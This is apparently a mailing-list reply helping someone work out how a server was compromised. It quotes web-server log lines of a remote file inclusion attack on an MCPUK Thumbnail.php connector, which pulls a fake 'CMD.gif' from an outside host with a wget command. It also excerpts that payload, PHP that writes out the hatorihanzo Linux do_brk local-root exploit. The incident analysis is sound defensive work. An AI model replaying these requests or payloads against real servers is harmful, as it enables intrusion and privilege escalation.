Re: ***DEB*: Re: help needed
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 495 "http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 499 "http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
http://213.202.214.106/CMD.gif isn't a gif.
[snip]
if ($kernel == "write") {
$kernel = "/*\n" .
" * hatorihanzo.c\n" .
" * Linux kernel do_brk vma overflow exploit.\n" .
" *\n" .
" * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
" *\n" .
" * Further research and exploit development by\n" .
" * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
" *\n" .
" * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
" *\n" .
" * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
" * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
[/snip]
I think this will give you an idea of what happened.
Reply to: